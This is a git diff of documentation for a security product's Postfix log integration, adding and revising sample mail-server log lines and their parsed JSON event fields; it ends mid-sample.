a/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md +++ b/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "client_connection_0.json" diff --git a/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md b/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md index 64a67a23ee..e27924e9d3 100644 --- a/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md +++ b/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AUD_It.json" diff --git a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md index 45173c42bc..a13e2b6e93 100644 --- a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md +++ b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "anvil.json" @@ -701,7 +701,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "email" ], "outcome": "success", - "reason": "Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information.", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", "type": [ "info" ] @@ -746,6 +746,62 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "connection_limited_1.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "52.97.201.210", + "domain": "smtp.office365.com", + "ip": "52.97.201.210" + }, + "log": { + "syslog": { + "appname": "postfix/smtp" + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1111111111111.US0394.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "52.97.201.210" + ] + }, + "source": { + "address": "1111111111111.US0394.PROD.OUTLOOK.COM", + "domain": "1111111111111.US0394.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "1111111111111.US0394.PROD", + "top_level_domain": "COM" + } + } + + ``` + + === "counter.json" ```json @@ -1096,13 +1152,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sent", "outcome": "success", + "outcome_reason": "success", "target": "network-traffic" }, "destination": { - "address": "example.org", - "domain": "example.org", - "registered_domain": "example.org", - "top_level_domain": "org" + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 }, "email": { "to": { @@ -1121,7 +1178,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "example.org" + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" ] } } @@ -1183,6 +1243,118 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "local5.json" + + ```json + + { + "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.localdomain", + "domain": "example.localdomain", + "subdomain": "example" + }, + "email": { + "to": { + "address": [ + "proxy@example.localdomain" + ] + } + }, + "log": { + "syslog": { + "appname": "postfix/local" + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "sample.orig.to" + }, + "related": { + "hosts": [ + "example.localdomain" + ] + } + } + + ``` + + +=== "local6.json" + + ```json + + { + "message": "04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "ip": "127.0.0.1", + "port": 2525, + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "john.doe@example.org" + ] + } + }, + "log": { + "syslog": { + "appname": "postfix/local" + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "jane.doe@example.com" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + === "message_id.json" ```json @@ -1731,13 +1903,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sent", "outcome": "success", + "outcome_reason": "success", "target": "network-traffic" }, "destination": { - "address": "example.org", - "domain": "example.org", - "registered_domain": "example.org", - "top_level_domain": "org" + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 }, "email": { "to": { @@ -1756,7 +1929,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "example.org" + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" ] } } @@ -3256,7 +3432,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "email" ], "outcome": "success", - "reason": "Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information.", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", "type": [ "info" ] @@ -3480,6 +3656,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "destination": { "address": "mail2sms.smsbox.net", "domain": "mail2sms.smsbox.net", + "ip": "127.0.0.1", + "port": 10025, "registered_domain": "smsbox.net", "subdomain": "mail2sms", "top_level_domain": "net" @@ -3502,6 +3680,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "hosts": [ "mail2sms.smsbox.net" + ], + "ip": [ + "127.0.0.1" ] } } @@ -3574,6 +3755,47 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "postfix8.json" + + ```json + + { + "message": "D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "smtp-in.example.com", + "ip": "5.6.7.8", + "port": 25 + }, + "log": { + "syslog": { + "appname": "postfix" + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp-in.example.com" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + === "postfix_cleanup1.json" ```json @@ -4572,6 +4794,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "network": { "protocol": "smtp" }, + "postfix": { + "headers": { + "from": [ + "EXAMPLE <[hola@example.org](mailto:hola@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, "related": { "hosts": [ "example.org" @@ -4588,21 +4818,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "sasl_login.json" +=== "replace_header_1.json" ```json { - "message": "warning: unknown[11.22.33.44]: SASL LOGIN authentication failed: authentication failure", + "message": "95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org)", "event": { "category": [ "email" ], - "reason": "SASL LOGIN authentication failed: authentication failure", "type": [ "info" ] }, + "email": { + "from": { + "address": [ + "test@example.org" + ] + } + }, "log": { "syslog": { "appname": "postfix/cleanup" @@ -4611,48 +4847,148 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "network": { "protocol": "smtp" }, + "postfix": { + "headers": { + "from": [ + "Example Mailbox <[test@example.org](mailto:test@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, "related": { - "ip": [ - "11.22.33.44" + "hosts": [ + "example.org" ] }, "source": { - "address": "11.22.33.44", - "ip": "11.22.33.44" + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" } } ``` -=== "smtp1.json" +=== "replace_header_2.json" ```json { - "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "message": "2F46A140256: replace: header From: \"Example Help\" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { "address": [ "jdoe@example.org" ] @@ -6507,6 +6843,6151 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "wo_appname_anvil.json" + + ```json + + { + "message": "statistics: max connection count 10 for (smtp:1.2.3.4) at Sep 11 10:47:30", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_appname_postfix_error.json" + + ```json + + { + "message": "2298F5F619: to=, relay=none, delay=89758, delays=89758/0.02/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.corp.com[1.1.1.1]:25: Connection timed out) 215", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "admin@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_appname_postfix_local.json" + + ```json + + { + "message": "11FDF5F62A: to=, relay=local, delay=80181, delays=80181/0.02/0/0, dsn=4.0.0, status=deferred (user lookup error)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "sub.corp.com", + "domain": "sub.corp.com", + "registered_domain": "corp.com", + "subdomain": "sub", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "USER@sub.corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "sub.corp.com" + ] + } + } + + ``` + + +=== "wo_appname_bounced.json" + + ```json + + { + "message": "3D770111AF50: to=, relay=none, delay=1.2, delays=1.1/0/0.03/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=corp.com type=AAAA: Host not found)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "bounced", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_cleanup.json" + + ```json + + { + "message": "77EFFC0015: warning: header Content-Disposition: inline; filename=\"image003.jpg\"; size=26055;??creation-date=\"Thu, 12 Sep 2019 12:39:01 GMT\";??modification-date=\"Thu, 12 Sep 2019 12:40:01 GMT\" from mail.outbound.protection.outlook.com[1.1.1.1]; from=<> to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "exemple.com", + "domain": "exemple.com", + "registered_domain": "exemple.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "john.doe@exemple.com" + ] + } + }, + "file": { + "created": "2019-09-12T12:39:01Z", + "ctime": "2019-09-12T12:40:01Z", + "name": "image003.jpg", + "size": 26055 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "exemple.com", + "mail.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.outbound.protection.outlook.com", + "domain": "mail.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_cleanup2.json" + + ```json + + { + "message": "3D770111AF50: warning: header Subject: Manquants LASTNAME GB Nouvelle version from unknown[10.1.1.1]; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "foo@corp.com" + ] + }, + "to": { + "address": [ + "first.last@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "SUBDOMAIN.CORP.COM", + "corp.com" + ], + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "SUBDOMAIN.CORP.COM", + "domain": "SUBDOMAIN.CORP.COM", + "ip": "10.1.1.1", + "registered_domain": "CORP.COM", + "subdomain": "SUBDOMAIN", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_cleanup3.json" + + ```json + + { + "message": "2CE6C111AF50: warning: header Subject: =?ISO-8859-1?Q?Pb_FTP_=3A_999_Aucune_action_effectu=E9e?= from unknown[10.1.1.1]; from= to= proto=ESMTP helo= 279", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "email@corp.com" + ] + }, + "to": { + "address": [ + "email@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "SUBDOMAIN.CORP.COM", + "corp.com" + ], + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "SUBDOMAIN.CORP.COM", + "domain": "SUBDOMAIN.CORP.COM", + "ip": "10.1.1.1", + "registered_domain": "CORP.COM", + "subdomain": "SUBDOMAIN", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_cleanup4.json" + + ```json + + { + "message": "B4B613F8B7: warning: header Content-Disposition: inline; filename=\"image001.png\"; size=8879;??creation-date=\"Thu, 14 Mar 2024 10:19:00 GMT\";??modification-date=\"Thu, 14 Mar 2024 10:19:00 GMT\" from subdomain.key.corp.com[1.1.1.1]; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "office365.eu.vadesecure.com", + "domain": "office365.eu.vadesecure.com", + "registered_domain": "vadesecure.com", + "subdomain": "office365.eu", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "ndr.journaling@corp.com" + ] + }, + "to": { + "address": [ + "corp@office365.eu.vadesecure.com" + ] + } + }, + "file": { + "created": "2024-03-14T10:19:00Z", + "ctime": "2024-03-14T10:19:00Z", + "name": "image001.png", + "size": 8879 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "office365.eu.vadesecure.com", + "subdomain.key.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "subdomain.key.corp.com", + "domain": "subdomain.key.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "subdomain.key", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_cleanup5.json" + + ```json + + { + "message": "707A12000A: warning: header Content-Disposition: attachment;??filename=\"?iso-8859-2?q?representative_on_migration.pdf?=\"; size=259210;?? from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "lacomte.net", + "domain": "lacomte.net", + "registered_domain": "lacomte.net", + "top_level_domain": "net" + }, + "email": { + "from": { + "address": [ + "photo@mordor.com" + ] + }, + "to": { + "address": [ + "Pipin.touque@lacomte.net" + ] + } + }, + "file": { + "name": "?iso-8859-2?q?representative_on_migration.pdf?=", + "size": 259210 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "lacomte.net", + "mordor.com" + ] + }, + "source": { + "address": "mordor.com", + "domain": "mordor.com", + "registered_domain": "mordor.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_client.json" + + ```json + + { + "message": "486D13F8B7: client=COMPUTER.sub.corp.com[1.1.1.1]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "COMPUTER.sub.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "COMPUTER.sub.corp.com", + "domain": "COMPUTER.sub.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "COMPUTER.sub", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_client_address_field_with_mask.json" + + ```json + + { + "message": "8116C5F683: action=pass, reason=client whitelist, client_name=mail-corp123.outbound.protection.outlook.com, client_address=1.1.1.1/32, sender=firstname.lastname@corp.fr, recipient=firstname.lastname@corp2.fr", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client whitelist", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client whitelist", + "target": "network-traffic" + }, + "destination": { + "address": "corp2.fr", + "domain": "corp2.fr", + "registered_domain": "corp2.fr", + "top_level_domain": "fr" + }, + "email": { + "from": { + "address": [ + "firstname.lastname@corp.fr" + ] + }, + "to": { + "address": [ + "firstname.lastname@corp2.fr" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp2.fr", + "mail-corp123.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail-corp123.outbound.protection.outlook.com", + "domain": "mail-corp123.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail-corp123.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_connect.json" + + ```json + + { + "message": "disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_connection_limited.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[1.1.1.1] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "1.1.1.1", + "domain": "smtp.office365.com", + "ip": "1.1.1.1" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "P212321.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "P212321.PROD.OUTLOOK.COM", + "domain": "P212321.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "P212321.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_connection_limited_1.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "52.97.201.210", + "domain": "smtp.office365.com", + "ip": "52.97.201.210" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1111111111111.US0394.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "52.97.201.210" + ] + }, + "source": { + "address": "1111111111111.US0394.PROD.OUTLOOK.COM", + "domain": "1111111111111.US0394.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "1111111111111.US0394.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_counter.json" + + ```json + + { + "message": "disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "localhost" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "localhost", + "domain": "localhost", + "ip": "127.0.0.1" + } + } + + ``` + + +=== "wo_appname_counter2.json" + + ```json + + { + "message": "disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 93", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "localhost" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "localhost", + "domain": "localhost", + "ip": "127.0.0.1" + } + } + + ``` + + +=== "wo_appname_counter3.json" + + ```json + + { + "message": "disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=2 data=1 quit=1 commands=6 137", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "disconnect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_delivered_via_spamfilter.json" + + ```json + + { + "message": "EF0B15F675: to=, relay=spamfilter, delay=4.2, delays=1.6/0/0/2.6, dsn=2.0.0, status=sent (delivered via spamfilter service) 148", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "corp.com", + "domain": "corp.com", + "registered_domain": "corp.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "firstname.lastname@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ] + } + } + + ``` + + +=== "wo_appname_dns.json" + + ```json + + { + "message": "dns: new_dns_packet: domain is utf8 flagged: ns1.example.org", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "ns1.example.org", + "domain": "ns1.example.org", + "registered_domain": "example.org", + "subdomain": "ns1", + "top_level_domain": "org" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "ns1.example.org" + ] + } + } + + ``` + + +=== "wo_appname_local1.json" + + ```json + + { + "message": "175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_local2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_local3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_local4.json" + + ```json + + { + "message": "B84078B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "to": { + "address": [ + "foreman-proxy@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.com" + ] + } + } + + ``` + + +=== "wo_appname_local5.json" + + ```json + + { + "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, 